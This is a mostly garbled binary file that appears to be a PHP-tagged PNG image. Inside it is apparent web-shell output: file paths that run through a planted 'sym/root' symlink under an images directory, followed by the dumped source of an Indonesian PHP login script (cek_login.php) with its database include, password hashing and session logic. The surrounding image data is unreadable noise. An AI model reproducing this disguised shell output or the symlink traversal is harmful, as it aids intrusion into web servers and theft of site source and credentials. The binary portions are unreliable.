php IHDR w Q )Ba pHYs sRGB gAMA a IDATxMk\U s&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨ G;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j- $_q?qS XzG'ay

| files >> /var/www/html/sub/images/sym/root/var/www/html/sub/images/sym/root/var/www/html/fl/ |
| files >> //var/www/html/sub/images/sym/root/var/www/html/sub/images/sym/root/var/www/html/fl/cek_login.php |
<?php
error_reporting(0);
include "konfig/koneksi.php";
function anti_injection($data){
$filter = mysql_real_escape_string(stripslashes(strip_tags(htmlspecialchars($data,ENT_QUOTES))));
return $filter;
}
$username = anti_injection($_POST['username']);
$pass = anti_injection(md5($_POST['password']));
// pastikan username dan password adalah berupa huruf atau angka.
if (!ctype_alnum($username) OR !ctype_alnum($pass)){
?>
<script type="text/javascript">alert("Nama pengguna dan kata sandi tidak boleh kosong");history.go(-1);</script>
<?php
}else{
$login=mysql_query("SELECT * FROM users WHERE username='$username' AND password='$pass'");
$ketemu=mysql_num_rows($login);
$r=mysql_fetch_array($login);
// Apabila username dan password ditemukan
if ($ketemu > 0){
session_start();
include "timeout.php";
$_SESSION['namauser'] = $r['username'];
$_SESSION['passuser'] = $r['password'];
$_SESSION['nama_lengkap'] = $r['nama_lengkap'];
// session timeout
$_SESSION['login'] = 1;
timer();
$sid_lama = session_id();
session_regenerate_id();
$sid_baru = session_id();
mysql_query("UPDATE users SET id_session='$sid_baru' WHERE username='$username'");
header('location:home');
}else{
//echo"$username dan $pass";
?>
<script type="text/javascript">alert("Pastikan nama pengguna dan kata sandi benar");history.go(-1);</script>
<?php
}
}
?>
y~or5J={Eeu磝Qk ᯘG{?+]ן?wM3X^歌>{7پK>on\jy Rg/=fOroNVv~Y+ NGuÝHWyw[eQʨSb> >}Gmx[o[<{Ϯ_qFvM IENDB`